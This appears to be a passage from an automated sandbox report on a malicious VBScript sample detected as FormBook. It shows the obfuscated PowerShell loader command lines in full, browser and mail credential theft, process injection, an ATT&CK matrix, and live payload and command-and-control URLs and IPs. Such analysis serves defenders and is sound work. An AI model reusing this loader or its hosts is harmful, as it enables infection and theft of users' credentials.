er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:shJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:shJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid,25_2_00C8C9F6
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid,25_2_00C8C9F6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C928C5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,25_2_00C928C5
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\explorer.exeDirectory queried: C:\Program Files (x86)\Windows Mail wab.exeJump to behavior
        Source: C:\Windows\explorer.exeDirectory queried: C:\Program Files (x86)\Windows Mail wab.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information321
        Scripting
        Valid Accounts11
        Windows Management Instrumentation
        321
        Scripting
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services11
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts1
        Native API
        1
        DLL Side-Loading
        711
        Process Injection
        4
        Obfuscated Files or Information
        1
        Credential API Hooking
        2
        File and Directory Discovery
        Remote Desktop Protocol1
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Shared Modules
        1
        Registry Run Keys / Startup Folder
        1
        Registry Run Keys / Startup Folder
        1
        Software Packing
        Security Account Manager215
        System Information Discovery
        SMB/Windows Admin Shares2
        Email Collection
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Exploitation for Client Execution
        Login HookLogin Hook1
        DLL Side-Loading
        NTDS1
        Query Registry
        Distributed Component Object Model1
        Credential API Hooking
        14
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts212
        Command and Scripting Interpreter
        Network Logon ScriptNetwork Logon Script1
        Rootkit
        LSA Secrets231
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable Media2
        PowerShell
        RC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
        Virtualization/Sandbox Evasion
        DCSync31
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job711
        Process Injection
        Proc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Rundll32
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466597 Sample: birectangular.vbs Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 61 www.yh-9.xyz 2->61 63 alignedinvestment.com 2->63 65 2 other IPs or domains 2->65 73 Snort IDS alert for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 81 12 other signatures 2->81 13 wscript.exe 1 2->13         started        16 rundll32.exe 2->16         started        signatures3 79 Performs DNS queries to domains with low reputation 61->79 process4 signatures5 107 VBScript performs obfuscated calls to suspicious functions 13->107 109 Suspicious powershell command line found 13->109 111 Wscript starts Powershell (via cmd or directly) 13->111 113 4 other signatures 13->113 18 powershell.exe 14 19 13->18         started        22 WmiPrvSE.exe 13->22         started        process6 dnsIp7 67 larryfrank.cpa 178.128.157.150, 443, 49705, 49707 DIGITALOCEAN-ASNUS Netherlands 18->67 83 Suspicious powershell command line found 18->83 85 Obfuscated command line found 18->85 87 Very long command line found 18->87 89 Found suspicious powershell code related to unpacking or dynamic code loading 18->89 24 powershell.exe 17 18->24         started        27 conhost.exe 18->27         started        29 cmd.exe 1 18->29         started        signatures8 process9 signatures10 95 Writes to foreign memory regions 24->95 97 Found suspicious powershell code related to unpacking or dynamic code loading 24->97 31 wab.exe 6 24->31         started        34 cmd.exe 1 24->34         started        36 wab.exe 24->36         started        process11 signatures12 115 Modifies the context of a thread in another process (thread injection) 31->115 117 Maps a DLL or memory area into another process 31->117 119 Sample uses process hollowing technique 31->119 121 Queues an APC in another process (thread injection) 31->121 38 explorer.exe 45 9 31->38 injected process13 dnsIp14 69 alignedinvestment.com 46.23.69.44, 49708, 49709, 80 UK2NET-ASGB United Kingdom 38->69 91 System process connects to network (likely due to code injection or exploit) 38->91 93 Searches for Windows Mail specific files 38->93 42 raserver.exe 1 18 38->42         started        46 wab.exe 38->46         started        48 wab.exe 38->48         started        signatures15 process16 file17 57 C:\Users\user\AppData\...\834logrv.ini, data 42->57 dropped 59 C:\Users\user\AppData\...\834logri.ini, data 42->59 dropped 99 Detected FormBook malware 42->99 101 Tries to steal Mail credentials (via file / registry access) 42->101 103 Tries to harvest and steal browser information (history, passwords, etc) 42->103 105 6 other signatures 42->105 50 cmd.exe 2 42->50         started        53 firefox.exe 42->53         started        signatures18 process19 signatures20 71 Tries to harvest and steal browser information (history, passwords, etc) 50->71 55 conhost.exe 50->55         started        process21

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        birectangular.vbs3%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        larryfrank.cpa0%VirustotalBrowse
        alignedinvestment.com0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://larryfrank.cpa0%VirustotalBrowse
        http://larryfrank.cpa0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus85.0%Avira URL Cloudsafe
        https://larryfrank.cpa0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus85.csv0%Avira URL Cloudsafe
        http://www.alignedinvestment.com/dd01/0%Avira URL Cloudsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://larryfrank.cpa/xdKCjAMEQDWiUiQMPQ170.bin0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus85.csvXR0%Avira URL Cloudsafe
        https://larryfrank.c0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negu0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus85.c0%Avira URL Cloudsafe
        www.x6hk8.com/dd01/0%Avira URL Cloudsafe
        https://larryfrank.cpa0%VirustotalBrowse
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus850%Avira URL Cloudsafe
        http://crl.microsh0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus80%Avira URL Cloudsafe
        https://larryfrank.cp0%Avira URL Cloudsafe
        https://github.com/Pester/Pester1%VirustotalBrowse
        https://larryfrank.cpa/Neg0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus85.cs0%Avira URL Cloudsafe
        https://larryfrank.cpa/N0%Avira URL Cloudsafe
        https://larryfrank.cpa/Negus0%Avira URL Cloudsafe
        http://www.alignedinvestment.com/dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g==0%Avira URL Cloudsafe
        https://larryfrank.cpa/0%Avira URL Cloudsafe
        https://larryfrank.cpa/Ne0%Avira URL Cloudsafe
        https://larryfrank.cpa/0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        larryfrank.cpa
        178.128.157.150
        truefalseunknown
        alignedinvestment.com
        46.23.69.44
        truetrueunknown
        www.yh-9.xyz
        unknown
        unknowntrue
          unknown
          www.alignedinvestment.com
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://larryfrank.cpa/Negus85.csvfalse
            • Avira URL Cloud: safe
            unknown
            http://www.alignedinvestment.com/dd01/true
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpa/xdKCjAMEQDWiUiQMPQ170.binfalse
            • Avira URL Cloud: safe
            unknown
            www.x6hk8.com/dd01/true
            • Avira URL Cloud: safe
            unknown
            http://www.alignedinvestment.com/dd01/?1b=FvhX3tn&P6A=GEjLb1Tin6w6/oNmqjqy4o9Gpfy10o15axoqIuar18d6EkZQtcnwuCqOmYoZ7k0oS8ANw4sL8g==true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://larryfrank.cpapowershell.exe, 0000000C.00000002.1958825500.000001A8C72C4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1836403995.00000000048E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1833904027.0000000002B62000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://go.micropowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://larryfrank.cpa/Negus85.powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://larryfrank.cpapowershell.exe, 0000000C.00000002.1958825500.000001A8C6D9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1958825500.000001A8C56F7000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000010.00000002.1839918830.00000000057F8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://larryfrank.cpowershell.exe, 0000000C.00000002.1958825500.000001A8C6766000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
